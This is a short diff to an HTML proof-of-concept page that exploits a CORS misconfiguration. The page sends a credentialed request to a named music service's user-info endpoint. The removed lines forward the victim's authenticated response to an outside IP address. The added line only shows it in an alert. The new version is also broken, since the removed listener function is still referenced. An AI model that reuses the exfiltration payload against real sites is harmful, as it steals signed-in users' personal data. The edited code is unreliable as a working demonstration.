--- a/cors.html
+++ b/cors.html
@@ -1,4 +1,3 @@
-<!DOCTYPE>
 <html>
 <script type="text/javascript">
 var req = new XMLHttpRequest();
@@ -6,8 +5,6 @@ req.onload = reqListener;
 req.open("get","https://institute.tencentmusic.com/auth/get_user_info",true);
 req.withCredentials = true;
 req.send();
-function reqListener() {
-location="//39.105.29.220/?response="+this.responseText;
-};
+alert(this.responseText);
 </script>
 </html>
